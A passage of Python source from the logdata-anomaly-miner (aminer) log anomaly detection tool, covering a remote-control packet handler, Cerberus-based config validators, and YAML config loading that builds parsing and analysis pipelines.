'allowlist_events_from_history': methods.allowlist_events_from_history, 'persist_all': methods.persist_all, 'list_backups': methods.list_backups, 'create_backup': methods.create_backup, 'reopen_event_handler_streams': methods.reopen_event_handler_streams, 'EnhancedNewMatchPathValueComboDetector': EnhancedNewMatchPathValueComboDetector.EnhancedNewMatchPathValueComboDetector, 'EventCorrelationDetector': EventCorrelationDetector.EventCorrelationDetector, 'EventCountClusterDetector': EventCountClusterDetector.EventCountClusterDetector, 'EventTypeDetector': EventTypeDetector.EventTypeDetector, 'EventFrequencyDetector': EventFrequencyDetector.EventFrequencyDetector, 'EventSequenceDetector': EventSequenceDetector.EventSequenceDetector, 'HistogramAnalysis': HistogramAnalysis.HistogramAnalysis, 'PathDependentHistogramAnalysis': HistogramAnalysis.PathDependentHistogramAnalysis, 'MatchFilter': MatchFilter.MatchFilter, 'MatchValueAverageChangeDetector': MatchValueAverageChangeDetector.MatchValueAverageChangeDetector, 'MatchValueStreamWriter': MatchValueStreamWriter.MatchValueStreamWriter, 'MissingMatchPathValueDetector': MissingMatchPathValueDetector.MissingMatchPathValueDetector, 'NewMatchIdValueComboDetector': NewMatchIdValueComboDetector.NewMatchIdValueComboDetector, 'NewMatchPathDetector': NewMatchPathDetector.NewMatchPathDetector, 'NewMatchPathValueComboDetector': NewMatchPathValueComboDetector.NewMatchPathValueComboDetector, 'NewMatchPathValueDetector': NewMatchPathValueDetector.NewMatchPathValueDetector, 'ParserCount': ParserCount.ParserCount, 'Rules': Rules, 'TimeCorrelationDetector': TimeCorrelationDetector.TimeCorrelationDetector, 'TimeCorrelationViolationDetector': TimeCorrelationViolationDetector.TimeCorrelationViolationDetector, 'SimpleMonotonicTimestampAdjust': TimestampCorrectionFilters.SimpleMonotonicTimestampAdjust, 'TimestampsUnsortedDetector': TimestampsUnsortedDetector.TimestampsUnsortedDetector, 'VariableTypeDetector': VariableTypeDetector.VariableTypeDetector, 'AllowlistViolationDetector': AllowlistViolationDetector.AllowlistViolationDetector } logging.getLogger(REMOTE_CONTROL_LOG_NAME).log(15, json_request_data[0]) logging.getLogger(DEBUG_LOG_NAME).debug('Remote control: %s', json_request_data[0]) # skipcq: PYL-W0603 global suspended_flag if json_request_data[0] in ('suspend_aminer()', 'suspend_aminer', 'suspend'): suspended_flag = True msg = methods.REMOTE_CONTROL_RESPONSE + 'OK. aminer is suspended now.' json_remote_control_response = json.dumps(msg) logging.getLogger(DEBUG_LOG_NAME).info(msg) elif json_request_data[0] in ('activate_aminer()', 'activate_aminer', 'activate'): suspended_flag = False msg = methods.REMOTE_CONTROL_RESPONSE + 'OK. aminer is activated now.' json_remote_control_response = json.dumps(msg) logging.getLogger(DEBUG_LOG_NAME).info(msg) else: # skipcq: PYL-W0122 exec(json_request_data[0], {'__builtins__': None}, exec_locals) json_remote_control_response = json.dumps(exec_locals.get('remoteControlResponse')) if methods.REMOTE_CONTROL_RESPONSE == '': methods.REMOTE_CONTROL_RESPONSE = None if exec_locals.get('remoteControlResponse') is None: json_remote_control_response = json.dumps(methods.REMOTE_CONTROL_RESPONSE) else: json_remote_control_response = json.dumps( exec_locals.get('remoteControlResponse') + methods.REMOTE_CONTROL_RESPONSE) # skipcq: FLK-E722 except: exception_data = traceback.format_exc() logging.getLogger(DEBUG_LOG_NAME).debug('Remote control exception data: %s', str(exception_data)) # This is little dirty but avoids having to pass over remoteControlResponse dumping again. if json_remote_control_response is None: json_remote_control_response = 'null' json_response = f"[{json.dumps(exception_data)}, {json_remote_control_response}]" if len(json_response) + 8 > self.max_control_packet_size: # Damn: the response would be larger than packet size. Fake a secondary exception and return part of the json string # included. Binary search of size could be more efficient, knowing the maximal size increase a string could have in json. max_include_size = len(json_response) min_include_size = 0 min_include_response_data = None while True: test_size = (max_include_size + min_include_size) >> 1 if test_size == min_include_size: break emergency_response_data = json.dumps( [f"Exception: Response too large\nPartial response data: {json_response[:test_size], None}..."]) if len(emergency_response_data) + 8 > self.max_control_packet_size: max_include_size = test_size - 1 else: min_include_size = test_size min_include_response_data = emergency_response_data json_response = min_include_response_data # Now size is OK, send the data json_response = json_response.encode() self.output_buffer += struct.pack("!I", len(json_response) + 8) + b'RRRR' + json_response else: msg = f"Invalid request type {repr(request_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def may_get(self): """ Check if a call to do_get would make sense. @return True if the input buffer already contains a complete wellformed packet or definitely malformed one. """ if len(self.input_buffer) < 4: return False request_length = struct.unpack("!I", self.input_buffer[:4])[0] return (request_length <= len(self.input_buffer)) or (request_length >= self.max_control_packet_size) def do_get(self): """ Get the next packet from the input buffer and remove it. @return the packet data including the length preamble or None when request not yet complete. """ if len(self.input_buffer) < 4: return None request_length = struct.unpack("!I", self.input_buffer[:4])[0] if (request_length < 0) or (request_length >= self.max_control_packet_size): msg = f"Invalid length value 0x{request_length} in malformed request starting with b64:" \ f"{base64.b64encode(self.input_buffer[:60])}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if request_length > len(self.input_buffer): return None request_data = self.input_buffer[:request_length] self.input_buffer = self.input_buffer[request_length:] return request_data def do_receive(self): """ Receive data from the remote side and add it to the input buffer. This method call expects to read at least one byte of data. A zero byte read indicates EOF and will cause normal handler termination when all input and output buffers are empty. Any other state or error causes handler termination before reporting the error. @return True if read was successful, false if EOF is reached without reading any data and all buffers are empty. @throws Exception when unexpected errors occured while receiving or shuting down the connection. """ data = os.read(self.remote_control_fd, 1 << 16) self.input_buffer += data if not data: self.terminate() def do_send(self): """ Send data from the output buffer to the remote side. @return True if output buffer was emptied. """ send_length = os.write(self.remote_control_fd, self.output_buffer) if send_length == len(self.output_buffer): self.output_buffer = b'' return True self.output_buffer = self.output_buffer[send_length:] return False def put_request(self, request_type, request_data): """ Add a request of given type to the send queue. @param request_type is a byte string denoting the type of the request. Currently only 'EEEE' is supported. @param request_data is a byte string denoting the content of the request. """ if not isinstance(request_type, bytes): msg = 'Request type is not a byte string' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if len(request_type) != 4: msg = 'Request type has to be 4 bytes long' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(request_data, bytes): msg = 'Request data is not a byte string' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if len(request_data) + 8 > self.max_control_packet_size: msg = 'Data too large to fit into single packet' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.output_buffer += struct.pack("!I", len(request_data) + 8) + request_type + request_data def put_execute_request(self, remote_control_code, remote_control_data): """Add a request to send exception data to the send queue.""" remote_control_data = json.dumps([JsonUtil.encode_object(remote_control_code), JsonUtil.encode_object(remote_control_data)]) self.put_request(b'EEEE', remote_control_data.encode()) def add_select_fds(self, input_select_fd_list, output_select_fd_list): """Update the file descriptor lists for selecting on read and write file descriptors.""" if self.output_buffer: output_select_fd_list.append(self.remote_control_fd) else: input_select_fd_list.append(self.remote_control_fd) def terminate(self): """End this remote control session.""" self.control_client_socket.close() # Avoid accidential reuse. self.control_client_socket = None self.remote_control_fd = -1 if self.input_buffer or self.output_buffer: msg = 'Unhandled input data' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def is_dead(self): """Check if this remote control connection is already dead.""" return self.remote_control_fd == -1 logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/ConfigValidator.py000066400000000000000000000224201437606560100326340ustar00rootroot00000000000000import sys import os import logging from cerberus import Validator from cerberus import TypeDefinition class ParserModelType: """Defines a type for parser classes.""" name = None is_model = False func = None def __init__(self, name): self.name = name if name.endswith("ModelElement"): self.is_model = True # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly. module = "aminer.parsing" if name == "DebugMatchContext": module += ".MatchContext" if name == "MultiLocaleDateTimeModelElement": module += ".DateTimeModelElement" else: module += "." + name self.func = getattr(__import__(module, fromlist=[name]), name) else: self.is_model = False try: self.func = __import__(name).get_model except (AttributeError, ImportError) as e: ymlext = ['.yml', '.YAML', '.YML', '.yaml'] module = None for path in sys.path: for extension in ymlext: abs_path = os.path.join(path, name + extension) if os.path.exists(abs_path): module = abs_path break if module is not None: import yaml import copy from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.YamlConfig import filter_config_errors, build_parsing_model with open(module) as yamlfile: # skipcq: PTC-W6004 try: yaml_data = yaml.safe_load(yamlfile) except yaml.YAMLError as exception: logging.getLogger(DEBUG_LOG_NAME).error(exception) raise exception with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/ParserNormalisationSchema.py', 'r') as sma: # skipcq: PYL-W0123 parser_normalisation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/ParserValidationSchema.py', 'r') as sma: # skipcq: PYL-W0123 parser_validation_schema = eval(sma.read()) normalisation_schema = {**parser_normalisation_schema} validation_schema = {**parser_validation_schema} v = ConfigValidator(validation_schema) if not v.validate(yaml_data, validation_schema): filtered_errors = copy.deepcopy(v.errors) filter_config_errors(filtered_errors, 'Parser', v.errors, parser_validation_schema) v = NormalisationValidator(normalisation_schema) if v.validate(yaml_data, normalisation_schema): test = v.normalized(yaml_data) yaml_data = test else: logging.getLogger(DEBUG_LOG_NAME).error(v.errors) raise ValueError(v.errors) self.func = build_parsing_model(yaml_data) if callable(self.func): self.func = self.func() else: raise e def __str__(self): return self.name class AnalysisType: """Defines a type for analysis classes.""" name = None func = None def __init__(self, name): self.name = name # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly. module = "aminer.analysis" if name in ("MatchPathFilter", "MatchValueFilter", "SubhandlerFilter"): module += ".AtomFilters" elif name in ("LinearNumericBinDefinition", "ModuloTimeBinDefinition", "PathDependentHistogramAnalysis", "BinDefinition", "HistogramData"): module += ".HistogramAnalysis" elif name == "MissingMatchPathListValueDetector": module += ".MissingMatchPathValueDetector" elif name in ("AndMatchRule", "OrMatchRule", "AtomFilterMatchAction", "DebugHistoryMatchRule", "EventGenerationMatchAction", "DebugMatchRule", "IPv4InRFC1918MatchRule", "ModuloTimeMatchRule", "NegationMatchRule", "ParallelMatchRule", "PathExistsMatchRule", "StringRegexMatchRule", "ValueDependentDelegatedMatchRule", "ValueDependentModuloTimeMatchRule", "ValueListMatchRule", "ValueMatchRule", "ValueRangeMatchRule"): module += ".Rules" elif name in ("TimeCorrelationDetector", "CorrelationFeature"): module += ".TimeCorrelationDetector" elif name in ("TimeCorrelationViolationDetector", "CorrelationRule", "EventClassSelector"): module += ".TimeCorrelationViolationDetector" elif name == "SimpleMonotonicTimestampAdjust": module += ".TimestampCorrectionFilters" elif name in ("SimpleUnparsedAtomHandler", "VerboseUnparsedAtomHandler"): module += ".UnparsedAtomHandlers" else: module += "." + name self.func = getattr(__import__(module, fromlist=[name]), name) def __str__(self): return self.name class EventHandlerType: """Defines a type for event classes.""" name = None func = None def __init__(self, name): self.name = name # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly. module = "aminer.events" if name in ("EventHandlerInterface", "EventSourceInterface"): module += ".EventInterfaces" elif name == "VolatileLogarithmicBackoffEventHistory": module += ".Utils" else: module += "." + name self.func = getattr(__import__(module, fromlist=[name]), name) def __str__(self): return self.name parser_type = TypeDefinition("parsermodel", (ParserModelType, str), ()) analysis_type = TypeDefinition("analysistype", (AnalysisType, str), ()) event_handler_type = TypeDefinition("eventhandlertype", (EventHandlerType, str), ()) class ConfigValidator(Validator): """Validates values from the configs.""" def _validate_has_start(self, has_start, field, value): """ Test if there is a key named "has_start". The rule's arguments are validated against this schema: {'type': 'boolean'} """ seen_start = False for var in value: if "start" in var and var["start"] is True: if seen_start: self._error(field, 'Only one parser with "start"-key is allowed') seen_start = True if has_start and not seen_start: self._error(field, 'Parser must contain a "start"-key') def _validate_bigger_than_or_equal(self, bigger_than_or_equal, field, value): """ Check if the value of the current attribute is bigger than the value of bigger_than. This check works for integers and floats. Usage: {"bigger_than_or_equal": ["lower_value_attribute", default_value_if_not_defined]} For example: "max_num_vals": {"type": "integer", "bigger_than_or_equal": ["min_num_vals", 1000]} The rule's arguments are validated against this schema: {'type': 'list'} """ key, default_value = bigger_than_or_equal if key not in self.document: lower_value = default_value else: lower_value = self.document[key] if value < lower_value: self._error(field, f"{field}(={str(value)}) must be bigger than or equal with {key}(={str(self.document[key])}).") class NormalisationValidator(ConfigValidator): """Normalises values from the configs.""" types_mapping = Validator.types_mapping.copy() types_mapping["parsermodel"] = parser_type types_mapping["analysistype"] = analysis_type types_mapping["eventhandlertype"] = event_handler_type # we skip the following issue, otherwise an # "must have self"-issue will pop up # skipcq: PYL-R0201 def _normalize_coerce_toparsermodel(self, value): """Create a ParserModelType from the string representation.""" if isinstance(value, str): return ParserModelType(value) return None # we skip the following issue, otherwise an # "must have self"-issue will pop up # skipcq: PYL-R0201 def _normalize_coerce_toanalysistype(self, value): """Create a AnalysisType from the string representation.""" if isinstance(value, str): return AnalysisType(value) return None # we skip the following issue, otherwise an # "must have self"-issue will pop up # skipcq: PYL-R0201 def _normalize_coerce_toeventhandlertype(self, value): """Create a EventHandlerType from the string representation.""" if isinstance(value, str): return EventHandlerType(value) return None logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py000066400000000000000000002102231437606560100316110ustar00rootroot00000000000000""" This file loads and parses a config-file in yaml format. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging import copy import ast from aminer.AminerConfig import DEBUG_LOG_NAME config_properties = {} yaml_data = None enhanced_new_match_path_value_combo_detector_reference = None def load_yaml(config_file): """ Load the yaml configuration from files. Basically there are two schema types: validation schemas and normalisation schemas. The validation schemas validate together with the BaseSchema all inputs as specifically as possible. Due to the limitations of oneof_schemas and the not functional normalisation in the validation schemas, the normalisation schemas are used to set default values and convert the date in right data types with coerce procedures. """ # We might be able to remove this and us it like the config_properties # skipcq: PYL-W0603 global yaml_data import yaml from aminer.ConfigValidator import ConfigValidator, NormalisationValidator import os with open(config_file) as yamlfile: # skipcq: PTC-W6004 try: yaml_data = yaml.safe_load(yamlfile) yamlfile.close() except yaml.YAMLError as exception: logging.getLogger(DEBUG_LOG_NAME).error(exception) raise exception with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/BaseSchema.py', 'r') as sma: # skipcq: PYL-W0123 base_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/ParserNormalisationSchema.py', 'r') as sma: # skipcq: PYL-W0123 parser_normalisation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/AnalysisNormalisationSchema.py', 'r') as sma: # skipcq: PYL-W0123 analysis_normalisation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/EventHandlerNormalisationSchema.py', 'r') as sma: # skipcq: PYL-W0123 event_handler_normalisation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/ParserValidationSchema.py', 'r') as sma: # skipcq: PYL-W0123 parser_validation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/AnalysisValidationSchema.py', 'r') as sma: # skipcq: PYL-W0123 analysis_validation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/EventHandlerValidationSchema.py', 'r') as sma: # skipcq: PYL-W0123 event_handler_validation_schema = eval(sma.read()) normalisation_schema = { **base_schema, **parser_normalisation_schema, **analysis_normalisation_schema, **event_handler_normalisation_schema} validation_schema = {**base_schema, **parser_validation_schema, **analysis_validation_schema, **event_handler_validation_schema} v = ConfigValidator(validation_schema) if not v.validate(yaml_data, validation_schema): filtered_errors = copy.deepcopy(v.errors) filter_config_errors(filtered_errors, 'Analysis', v.errors, analysis_validation_schema) filter_config_errors(filtered_errors, 'Parser', v.errors, parser_validation_schema) filter_config_errors(filtered_errors, 'EventHandlers', v.errors, event_handler_validation_schema) raise ValueError(f'Config-Error: {filtered_errors}') v = NormalisationValidator(normalisation_schema) if v.validate(yaml_data, normalisation_schema): test = v.normalized(yaml_data) yaml_data = test else: logging.getLogger(DEBUG_LOG_NAME).error(v.errors) raise ValueError(v.errors) # Set default values for key, val in yaml_data.items(): config_properties[str(key)] = val def filter_config_errors(filtered_errors, key_name, errors, schema): """Filter oneof outputs to produce a clear overview of the error.""" oneof = schema[key_name]['schema']['oneof'] if key_name in errors: for i, err in enumerate(errors[key_name]): if isinstance(err, str): err = {0: err} for key in err: if 'none or more than one rule validate' in err[key]: for cause in err[key]: if isinstance(cause, dict): # we need to copy the dictionary as it is not possible to iterate through it and change the size. last_error = None for definition in copy.deepcopy(cause): if 'type' in cause[definition][0] and cause[definition][0]['type'][0].startswith('unallowed value '): last_error = cause[definition][0]['type'][0] del cause[definition] else: oneof_def_pos = int(definition.split(' ')[-1]) oneof_schema_type = oneof[oneof_def_pos]['schema']['type'] if 'forbidden' in oneof_schema_type: cause[definition][0]['type'] = {'forbidden': oneof_schema_type['forbidden']} elif 'allowed' in oneof_schema_type: cause[definition][0]['type'] = {'allowed': oneof_schema_type['allowed']} if len(cause) == 0 and last_error is not None: cause[key_name + ' error'] = last_error filtered_errors[key_name][i] = err # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ parsing_model = build_parsing_model() anomaly_event_handlers, atom_filter = build_input_pipeline(analysis_context, parsing_model) build_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, parsing_model) event_handler_id_list = build_event_handlers(analysis_context, anomaly_event_handlers) # do not check UnparsedAtomHandler for index, analysis_component in enumerate(atom_filter.subhandler_list[1:]): if analysis_component[0].output_event_handlers is not None: event_handlers = [] for i in analysis_component[0].output_event_handlers: event_handlers.append(anomaly_event_handlers[event_handler_id_list.index(i)]) atom_filter.subhandler_list[index+1][0].output_event_handlers = event_handlers def build_parsing_model(data=None): """Build the parsing model.""" parser_model_dict = {} start = None ws_count = 0 if data is None: data = yaml_data for item in data['Parser']: if item['id'] in parser_model_dict: raise ValueError(f'Config-Error: The id "{item["id"]}" occurred multiple times in Parser!') if 'start' in item and item['start'] is True and item['type'].name not in ['JsonModelElement', 'JsonStringModelElement']: start = item if item['type'].is_model: if 'args' in item: if isinstance(item['args'], list): # skipcq: PTC-W0048 for i, value in enumerate(item["args"]): if (isinstance(value, str) and value == "WHITESPACE") or (isinstance(value, bytes) and value == b"WHITESPACE"): from aminer.parsing.FixedDataModelElement import FixedDataModelElement sp = f'sp{int(ws_count)}' item["args"][i] = FixedDataModelElement(sp, b' ') ws_count += 1 if item['type'].name not in ('DecimalFloatValueModelElement', 'DecimalIntegerValueModelElement'): # encode string to bytearray for j, val in enumerate(item['args']): if isinstance(val, str): item['args'][j] = val.encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r"). \ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") else: if item['type'].name not in ('DecimalFloatValueModelElement', 'DecimalIntegerValueModelElement') and \ isinstance(item['args'], str): item['args'] = item['args'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") if item['type'].name == 'ElementValueBranchModelElement': value_model = parser_model_dict.get(item['args'][0].decode()) if value_model is None: msg = f'The parser model {item["args"][0].decode()} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) branch_model_dict = {} for i in item['branch_model_dict']: key = i['id'] model = i['model'] if parser_model_dict.get(model) is None: msg = f'The parser model {key} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) branch_model_dict[key] = parser_model_dict.get(model) parser_model_dict[item['id']] = item['type'].func(item['name'], value_model, item['args'][1].decode(), branch_model_dict) elif item['type'].name == 'DateTimeModelElement': parser_model_dict[item['id']] = item['type'].func( item['name'], item['date_format'].encode(), None, item['text_locale'], item['start_year'], item['max_time_jump_seconds']) elif item['type'].name == 'MultiLocaleDateTimeModelElement': date_formats = [] for date_format in item['date_formats']: if len(date_format['format']) != 3: msg = 'The date_format must have a size of 3!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) fmt = date_format['format'] fmt[0] = fmt[0].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").replace(b"\\\\", b"\\").\ replace(b"\\b", b"\b") date_formats.append(tuple(fmt)) parser_model_dict[item['id']] = item['type'].func( item['name'], date_formats, item['start_year'], item['max_time_jump_seconds']) elif item['type'].name == 'RepeatedElementDataModelElement': model = item['args'][0].decode() if parser_model_dict.get(model) is None: msg = f'The parser model {model} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) item['args'][0] = parser_model_dict.get(model) parser_model_dict[item['id']] = item['type'].func(item['name'], item['args'][0]) if len(item['args']) == 2: parser_model_dict[item['id']] = item['type'].func(item['name'], item['args'][0], item['args'][1]) elif len(item['args']) == 3: parser_model_dict[item['id']] = item['type'].func(item['name'], item['args'][0], item['args'][1], item['args'][2]) elif len(item['args']) > 3: msg = 'The RepeatedElementDataModelElement does not have more than 3 arguments.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) elif item['type'].name == 'DecimalFloatValueModelElement': parser_model_dict[item['id']] = item['type'].func( item['name'], item['value_sign_type'], item['value_pad_type'], item['exponent_type']) elif item['type'].name == 'DecimalIntegerValueModelElement': parser_model_dict[item['id']] = item['type'].func(item['name'], item['value_sign_type'], item['value_pad_type']) elif item['type'].name in ('FirstMatchModelElement', 'SequenceModelElement'): children = [] if not isinstance(item['args'], list): msg = f'"args" has to be a list when using the {item["type"].name}. Currently args is defined as {repr(item["args"])}' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for child in item['args']: if isinstance(child, bytes): child = child.decode() if isinstance(child, str): if parser_model_dict.get(child) is None: msg = f'The parser model {child} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) children.append(parser_model_dict.get(child)) else: children.append(child) parser_model_dict[item['id']] = item['type'].func(item['name'], children) elif item['type'].name == 'OptionalMatchModelElement': optional_element = parser_model_dict.get(item['args'].decode()) if optional_element is None: msg = f'The parser model {item["args"].decode()} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) parser_model_dict[item['id']] = item['type'].func(item['name'], optional_element) elif item['type'].name == 'DelimitedDataModelElement': delimiter = item['delimiter'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") parser_model_dict[item['id']] = item['type'].func(item['name'], delimiter, item['escape'], item['consume_delimiter']) elif item['type'].name == 'JsonModelElement': key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict) if 'start' in item and item['start'] is True: start = item['type'].func( item['name'], key_parser_dict, item['optional_key_prefix'], item['nullable_key_prefix'], item['allow_all_fields']) else: parser_model_dict[item['id']] = item['type'].func( item['name'], key_parser_dict, item['optional_key_prefix'], item['nullable_key_prefix'], item['allow_all_fields']) elif item['type'].name == 'JsonStringModelElement': key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict) if 'start' in item and item['start'] is True: start = item['type'].func(item['name'], key_parser_dict, item['strict'], item['ignore_null']) else: parser_model_dict[item['id']] = item['type'].func(item['name'], key_parser_dict, item['strict'], item['ignore_null']) else: if 'args' in item: parser_model_dict[item['id']] = item['type'].func(item['name'], item['args']) else: parser_model_dict[item['id']] = item['type'].func(item['name']) else: if callable(item['type']): parser_model_dict[item['id']] = item['type'].func() else: parser_model_dict[item['id']] = item['type'].func while callable(parser_model_dict[item['id']]): parser_model_dict[item['id']] = parser_model_dict[item['id']]() if start.__class__.__name__ in ['JsonModelElement', 'JsonStringModelElement']: parsing_model = start else: parsing_model = parser_model_dict[start['id']] return parsing_model def build_input_pipeline(analysis_context, parsing_model): """Build the input pipeline.""" # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) analysis_context.register_component(atom_filter, component_name="AtomFilter") anomaly_event_handlers = [] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory timestamp_paths = yaml_data['Input']['timestamp_paths'] if isinstance(timestamp_paths, str): timestamp_paths = [timestamp_paths] sync_wait_time = yaml_data['Input']['sync_wait_time'] eol_sep = yaml_data['Input']['eol_sep'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") json_format = yaml_data['Input']['json_format'] if yaml_data['Input']['multi_source'] is True: from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync if yaml_data['Input']['adjust_timestamps'] is True: from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust atom_handler_list = [SimpleMultisourceAtomSync([SimpleMonotonicTimestampAdjust([atom_filter])], sync_wait_time=sync_wait_time)] else: atom_handler_list = [SimpleMultisourceAtomSync([atom_filter], sync_wait_time=sync_wait_time)] else: if yaml_data['Input']['adjust_timestamps'] is True: from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust atom_handler_list = [SimpleMonotonicTimestampAdjust([atom_filter])] else: atom_handler_list = [atom_filter] analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, atom_handler_list, anomaly_event_handlers, default_timestamp_path_list=timestamp_paths, eol_sep=eol_sep, json_format=json_format) return anomaly_event_handlers, atom_filter def build_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, parsing_model): """Build the analysis components.""" suppress_detector_list = analysis_context.suppress_detector_list has_unparsed_handler = False has_new_match_path_handler = False if 'Analysis' in yaml_data and yaml_data['Analysis'] is not None: analysis_dict = {} match_action_dict = {} match_rules_dict = {} correlation_rules = {} # changed order if ETD is defined. for item in yaml_data['Analysis']: if item['type'].name == 'EventTypeDetector': index = yaml_data['Analysis'].index(item) new_analysis_list = [item] del yaml_data['Analysis'][index] new_analysis_list += yaml_data['Analysis'] yaml_data['Analysis'] = new_analysis_list break for item in yaml_data['Analysis']: if item['type'].name in ('SimpleUnparsedAtomHandler', 'VerboseUnparsedAtomHandler'): has_unparsed_handler = True # make room for the UnparsedAtomHandler. atom_filter.add_handler(None, True) break for item in yaml_data['Analysis']: if item['type'].name == 'NewMatchPathDetector': has_new_match_path_handler = True break has_new_match_path_handler, has_unparsed_handler = add_default_analysis_components( analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model) for item in yaml_data['Analysis']: stop_when_handled_flag = False if item['id'] == 'None': comp_name = None else: comp_name = item['id'] if analysis_context.get_component_by_name(comp_name) is not None: raise ValueError(f'Config-Error: The id "{comp_name}" occurred multiple times in Analysis!') if 'learn_mode' in item: learn = item['learn_mode'] else: if 'LearnMode' not in yaml_data: msg = 'Config-Error: LearnMode must be defined if an analysis component does not define learn_mode.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) learn = yaml_data['LearnMode'] func = item['type'].func if item['suppress']: if comp_name is None: raise ValueError(f'Config-Error: id must be specified for the analysis component {item["type"]} to enable suppression.') suppress_detector_list.append(comp_name) if item['type'].name == 'NewMatchPathValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'MatchPathFilter': parsed_atom_handler_lookup_list = [] for atom_handler in item['parsed_atom_handler_lookup_list']: if atom_handler[1] is not None: if analysis_context.get_component_by_name(atom_handler[1]) is None: msg = f'The atom handler {atom_handler[1]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) atom_handler[1] = analysis_context.get_component_by_name(atom_handler[1]) parsed_atom_handler_lookup_list.append(tuple(i for i in atom_handler)) default_parsed_atom_handler = item['default_parsed_atom_handler'] if default_parsed_atom_handler is not None: if analysis_context.get_component_by_name(default_parsed_atom_handler) is None: msg = f'The atom handler {default_parsed_atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) default_parsed_atom_handler = analysis_context.get_component_by_name(default_parsed_atom_handler) tmp_analyser = func(parsed_atom_handler_lookup_list, default_parsed_atom_handler=default_parsed_atom_handler) elif item['type'].name == 'MatchValueFilter': parsed_atom_handler_dict = {} for atom_handler in item['parsed_atom_handler_dict']: if analysis_context.get_component_by_name(atom_handler) is None: msg = f'The atom handler {atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) parsed_atom_handler_dict[atom_handler] = analysis_context.get_component_by_name(atom_handler) default_parsed_atom_handler = item['default_parsed_atom_handler'] if default_parsed_atom_handler is not None: if analysis_context.get_component_by_name(default_parsed_atom_handler) is None: msg = f'The atom handler {default_parsed_atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) default_parsed_atom_handler = 